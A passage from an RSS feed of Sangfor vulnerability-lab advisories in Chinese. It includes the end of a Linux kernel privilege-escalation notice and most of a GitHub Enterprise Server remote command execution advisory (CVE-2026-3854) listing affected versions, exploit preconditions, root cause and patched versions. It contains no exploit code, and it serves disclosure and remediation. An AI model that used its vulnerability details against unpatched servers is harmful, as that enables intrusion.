class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">非必要不暴露服务到公网，限制访问源为可信范围。</span></p></li></ul><ul style="list-style-type: disc;" class="list-paddingleft-1"><li><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">定期更新系统及各类组件至安全版本，及时修补已知隐患。</span></p></li></ul></p><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041789" src="https://wechat2rss.xlab.app/img-proxy/?k=a04fbc37&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxQYEh9aSU1J9OzTnEKMS7HzL8ickEIBnmTVXArX48Kqiap4ceGgjK38QemViaBKb1OadZIc7ZiaChz8WKCvvwT9p0OvsCxrBG1lEq8%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">深信服解决方案</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">风险资产发现</span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">支持对Linux Kernel的主动检测，</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">可批量检出业务场景中该事件的受影响资产情况，</span></span></strong><span leaf="">相关产品如下：</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服云镜YJ】</span></span></strong><span leaf=""> 已发布资产检测方案，指纹ID:0006320。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">【深信服漏洞评估工具TSS】</span></span></strong><span leaf="">已发布资产检测方案，指纹ID:0006320。</span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">参考链接</span></b></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p><span leaf=""><a href="https://www.openwall.com/lists/oss-security/2026/04/29/23" target="_blank">https://www.openwall.com/lists/oss-security/2026/04/29/23</a></span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;font-size: 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">时间轴</span></b></p></div></div></div></div><div style="text-align: left;justify-content: flex-start;margin: 10px 0%;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="padding: 0px 6px;text-align: center;color: rgb(56, 52, 52);letter-spacing: 1px;line-height: 1;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2026/04/30</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;box-shadow: rgb(102, 188, 41) 0px 0px 0px;border-left: 2px dotted rgb(102, 188, 41);border-bottom-left-radius: 0px;flex: 100 100 0%;align-self: flex-start;height: auto;margin: 0px 6px 0px 12px;padding: 9px 16px 20px 24px;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(102, 102, 102);text-align: justify;letter-spacing: 1px;line-height: 1.6;box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">深瞳漏洞实验室监测到Linux Kernel Copy Fail 本地权限提升漏洞信息。</span></p></div></div></div><div style="text-align: left;justify-content: flex-start;margin: 10px 0%;display: flex;flex-flow: row;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;min-width: 10%;max-width: 100%;flex: 0 0 auto;height: auto;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="padding: 0px 6px;text-align: center;color: rgb(56, 52, 52);letter-spacing: 1px;line-height: 1;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">2026/04/30</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;width: auto;vertical-align: top;box-shadow: rgb(102, 188, 41) 0px 0px 0px;border-left: 2px dotted rgb(102, 188, 41);border-bottom-left-radius: 0px;flex: 100 100 0%;align-self: flex-start;height: auto;margin: 0px 6px 0px 12px;padding: 9px 16px 20px 24px;box-sizing: border-box;"><div style="font-size: 15px;color: rgb(102, 102, 102);text-align: justify;letter-spacing: 1px;line-height: 1.6;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">深瞳漏洞实验室发布漏洞通告。</span></p></div></div></div><div style="text-align: unset;font-size: 15px;box-sizing: border-box;"><p style="margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">点击</span><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">阅读原文</span></span></strong><span leaf="">，及时关注并登录深信服</span><strong style="box-sizing: border-box;"><span leaf="">智安全平台</span></strong><span leaf="">，可轻松查询漏洞相关解决方案。</span></p></div><div style="text-align: unset;font-size: 15px;box-sizing: border-box;"><p style="text-align: center;" nodeleaf=""><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100041791" data-ratio="0.5" data-s="300,640" type="block" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=5129ad56&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FAPc6NwjLsxTFbEe9SEL36MtjjtkoKDMyQ4wWBtYCXT6tvwMCm65OrOpS9kBLUvJGz6z79qgSfzmPuHiaqyq4A7k8E0iavPFhIsuHicBxaIU5NM%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><p style="text-align: center;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.4" data-s="300,640" data-type="jpeg" data-w="1280" type="block" data-imgfileid="100039351" src="https://wechat2rss.xlab.app/img-proxy/?k=ca59cfa2&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2Fw8NHw6tcQ5zvcIHbwGGYKbqDVYsVKzNNia1jYtHf49C7133AlDXAgex2W4lFvpia56tjQQDkiauNBrl08YbxqG01A%2F640%3Fwx_fmt%3Djpeg%26from%3Dappmsg"/></p></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="https://sec.sangfor.com.cn/security-vulnerability/detail?vuln_sfv=SF_2026_16322%5cx26amp;lang=ZH-CN">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=be5f1c27&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg2NjgzNjA5NQ%3D%3D%26mid%3D2247525464%26idx%3D1%26sn%3D8acda386bfbde5ad1c91b714adbca8f2">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 30 Apr 2026 16:55:00 +0800</pubDate>
    </item>
    <item>
      <title>【漏洞通告】Github-Enterprise远程命令执行漏洞(CVE-2026-3854)</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg2NjgzNjA5NQ==&amp;mid=2247525429&amp;idx=1&amp;sn=efffa2a9040316ec6d7753bd4b59e865</link>
      <description>2026年4月29日，深瞳漏洞实验室监测到一则Github-Enterprise组件存在命令执行漏洞的信息，漏洞编号：CVE-2026-3854，漏洞威胁等级：高危。</description>
      <content:encoded><![CDATA[<p><span>深瞳漏洞实验室</span> <span>2026-04-29 20:25</span> <span style="display: inline-block;">北京</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=bef80aaa&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FAPc6NwjLsxSj5hgqAZLXCj5gl8YJhcfopxaqeDUwoKiaOEjUqyMRTP5KGatl6reibicQ3k4Mw8KeRAMub8dYuTWUo8bDUxo01YTFMeuWXdIDiac%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>2026年4月29日，深瞳漏洞实验室监测到一则Github-Enterprise组件存在命令执行漏洞的信息，漏洞编号：CVE-2026-3854，漏洞威胁等级：高危。</p>
  <div style="box-sizing: border-box;font-style: normal;font-weight: 400;text-align: justify;font-size: 16px;color: rgb(62, 62, 62);" data-pm-slice="0 0 []"><div style="text-align: center;margin-top: 10px;margin-bottom: 10px;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.16635687732342008" data-s="300,640" data-type="gif" data-w="1076" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041765" src="https://wechat2rss.xlab.app/img-proxy/?k=816ccd33&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxTuCzUiaW0JtfTJgHiakia3pWVVbicLjgvE1bHTrcqkMSq2E9Q5Aia1DO963UQPGDm3ib5p9XGBcdnXmH7WSBUQOEeTfxlEUumiaVWZ1g%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 25px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 94%;vertical-align: top;border-style: solid;border-width: 1px;border-color: rgb(13, 74, 182);flex: 0 0 auto;align-self: flex-start;height: auto;box-shadow: rgb(13, 74, 182) 6px 6px 0px;background-color: rgb(255, 255, 255);box-sizing: border-box;"><div style="margin: 18px 0% 0px;box-sizing: border-box;"><div style="font-size: 15px;text-align: justify;line-height: 1.6;letter-spacing: 1px;padding: 0px 23px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">漏洞名称：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Github-Enterprise远程命令执行漏洞(CVE-2026-3854)</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">组件名称：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">Github-Enterprise</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">影响范围：</span></strong></span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">GitHub Enterprise Server ≤ 3.19.1</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">漏洞类型：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">命令执行</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">利用条件：</span></strong></span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">1、用户认证：需要用户认证</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2、前置条件：默认配置</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">3、触发方式：远程</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">综合评价：</span></span></strong></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">&lt;综合评定利用难度&gt;：困难，需要经过认证且拥有推送权限的用户。</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">&lt;综合评定威胁等级&gt;：高危，能造成远程代码执行。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">官方解决方案：</span></span></strong></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">已发布</span></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">漏洞分析</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041766" src="https://wechat2rss.xlab.app/img-proxy/?k=4c5fbf5f&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxSicQQyjFibBicRbhLWJhlmbUXs2N67mZEuiaNicTyhS188eqMAkp48iab3BEYZYDBzZqgrsOjaJt9augMLwpg7JvHbSkfNG9ibB4ibRkg%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><b style="box-sizing: border-box;"><span leaf="">组件介绍</span></b></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);padding: 0px;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">GitHub企业云是一个针对大型企业或团队在GitHub.com上进行合作的计划。</span></p></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041763" src="https://wechat2rss.xlab.app/img-proxy/?k=83b08d0a&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_gif%2FAPc6NwjLsxTHHzgicYm6PY3CXcIBe4tB1OWqGzsdK0WUmvw2QYdXVneUtfBPqib4Zs8ENH0dUicjWKWkaQXf7BPVhJVpQEsEO1bvWsqdzFe9e0%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">漏洞简介</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">2026年4月29日，深瞳漏洞实验室监测到一则Github-Enterprise组件存在命令执行漏洞的信息，漏洞编号：CVE-2026-3854，漏洞威胁等级：高危。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">GitHub Enterprise Server是美国GitHub开源的一个应用软件。提供一个将自己的GitHub实例设置为虚拟设备，从而提供可扩展，易于管理的平台。</span></p><p style="word-break: break-all;white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span style="color: rgb(13, 74, 182);box-sizing: border-box;"><span leaf="">GitHub Enterprise Server 3.14.24版本、3.15.19版本、3.16.15版本、3.17.12版本、3.18.6版本和3.19.3版本存在安全漏洞，该漏洞源于对推送选项值中和不当，可能导致远程代码执行。</span></span></strong></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">影响范围</span></strong></p></div></div></div></div><div style="margin: 25px 0%;box-sizing: border-box;"><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">目前受影响的Github-Enterprise版本：</span></p><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">GitHub Enterprise Server ≤ 3.19.1</span></p></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: center;justify-content: center;box-sizing: border-box;"><div style="display: inline-block;vertical-align: top;width: auto;background-color: rgb(229, 240, 247);flex: 0 0 auto;align-self: flex-start;min-width: 10%;max-width: 100%;height: auto;box-shadow: rgb(0, 0, 0) 0px 0px 0px;box-sizing: border-box;"><div style="transform: translate3d(4px, 0px, 0px);-webkit-transform: translate3d(4px, 0px, 0px);-moz-transform: translate3d(4px, 0px, 0px);-o-transform: translate3d(4px, 0px, 0px);margin: 6px 0%;box-sizing: border-box;"><div style="padding: 0px 17px;color: rgb(13, 74, 182);text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">解决方案</span></strong></p></div></div></div></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: border-box;"><p style="max-width: 100%;vertical-align: middle;display: inline-block;line-height: 0;width: 100%;height: auto;box-sizing: border-box;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="0.1503267973856209" data-s="300,640" data-type="gif" data-w="306" style="vertical-align: middle;max-width: 100%;width: 100%;box-sizing: border-box;" data-imgfileid="100041764" src="https://wechat2rss.xlab.app/img-proxy/?k=ac48843d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_gif%2FAPc6NwjLsxQNIq1kcT62RpXrwQ8RB5L8Hpbh752YSPf3ia8qDJCLuD5lBMGTjMq6LwbtrBiccRMO0PzibfLytSEt2089xm6xFmXOqx6hLq2eIk%2F640%3Fwx_fmt%3Dgif%26from%3Dappmsg"/></p></div></div></div></div></div><div style="display: inline-block;vertical-align: middle;width: auto;align-self: center;flex: 100 100 0%;box-sizing: border-box;"><div style="margin: 0px 0%;box-sizing: border-box;"><div style="color: rgb(13, 74, 182);letter-spacing: 1px;line-height: 1.5;text-align: justify;box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><strong style="box-sizing: border-box;"><span leaf="">官方修复建议</span></strong></p></div></div></div></div><div style="font-size: 15px;letter-spacing: 1px;color: rgb(110, 107, 107);box-sizing: border-box;"><p style="white-space: normal;margin: 0px;padding: 0px;box-sizing: border-box;"><span leaf="">官方已发布最新版本修复该漏洞，建议受影响用户将GitHub Enterprise Server升级到如下版本：</span><span leaf=""><br/></span><span leaf="">GitHub Enterprise Server 3.14.25 或更高版本</span><span leaf=""><br/></span><span leaf="">GitHub Enterprise Server 3.15.20 或更高版本</span><span leaf=""><br/></span><span leaf="">GitHub Enterprise Server 3.16.16 或更高版本</span><span leaf=""><br/></span><span leaf="">GitHub Enterprise Server 3.17.13 或更高版本</span><span leaf=""><br/></span><span leaf="">GitHub Enterprise Server 3.18.7 或更高版本</span><span leaf=""><br/></span><span leaf="">GitHub Enterprise Server 3.19.4 或更高版本</span><span leaf=""><br/></span><span leaf="">GitHub Enterprise Server 3.20.0 或更高版本</span><span leaf=""><br/></span><span leaf="">下载链接：</span><span leaf=""><br/></span><span leaf=""><a href="https://docs.github.com/en/enterprise-server@3.14/admin/release-notes" target="_blank">https://docs.github.com/en/enterprise-server@3.14/admin/release-notes</a><a class="wx_topic_link" topic-id="mojzw14g-34d0r4" style="color: #576B95 !important;" data-topic="1" data-recommend="">#3</a>.14.25</span><span leaf=""><br/></span><span leaf=""><a href="https://docs.github.com/en/enterprise-server@3.15/admin/release-notes" target="_blank">https://docs.github.com/en/enterprise-server@3.15/admin/release-notes</a><a class="wx_topic_link" topic-id="mojzw14g-aouxqa" style="color: #576B95 !important;" data-topic="1" data-recommend="">#3</a>.15.20</span><span leaf=""><br/></span><span leaf=""><a href="https://docs.github.com/en/enterprise-server@3.16/admin/release-notes" target="_blank">https://docs.github.com/en/enterprise-server@3.16/admin/release-notes</a><a class="wx_topic_link" topic-id="mojzw14g-j61z51" style="color: #576B95 !important;" data-topic="1" data-recommend="">#3</a>.16.16</span><span leaf=""><br/></span><span leaf=""><a href="https://docs.github.com/en/enterprise-server@3.17/admin/release-notes" target="_blank">https://docs.github.com/en/enterprise-server@3.17/admin/release-notes</a><a class="wx_topic_link" topic-id="mojzw14g-jz8g8y" style="color: #576B95 !important;" data-topic="1" data-recommend="">#3</a>.17.13</span><span leaf=""><br/></span><span leaf=""><a href="https://docs.github.com/en/enterprise-server@3.18/admin/release-notes" target="_blank">https://docs.github.com/en/enterprise-server@3.18/admin/release-notes</a><a class="wx_topic_link" topic-id="mojzw14g-jgm80f" style="color: #576B95 !important;" data-topic="1" data-recommend="">#3</a>.18.7</span><span leaf=""><br/></span><span leaf=""><a href="https://docs.github.com/en/enterprise-server@3.19/admin/release-notes" target="_blank">https://docs.github.com/en/enterprise-server@3.19/admin/release-notes</a><a class="wx_topic_link" topic-id="mojzw14g-6am9uc" style="color: #576B95 !important;" data-topic="1" data-recommend="">#3</a>.19.4</span></p></div><div style="display: flex;flex-flow: row;margin: 50px 0% 10px;text-align: left;justify-content: flex-start;box-sizing: border-box;"><div style="display: inline-block;vertical-align: middle;width: auto;flex: 0 0 0%;align-self: center;height: auto;margin: 0px 0px 0px -12px;box-sizing: border-box;"><div style="transform: rotateZ(90deg);-webkit-transform: rotateZ(90deg);-moz-transform: rotateZ(90deg);-o-transform: rotateZ(90deg);box-sizing: border-box;"><div style="display: flex;flex-flow: row;text-align: center;justify-content: center;margin: 0px 0%;box-sizing: border-box;"><div style="display: inline-block;width: 28px;vertical-align: top;background-color: rgb(102, 188, 41);flex: 0 0 auto;height: auto;line-height: 0;letter-spacing: 0px;align-self: flex-start;box-sizing: border-box;"><div style="margin: 0px 0%;line-height: 0;box-sizing: 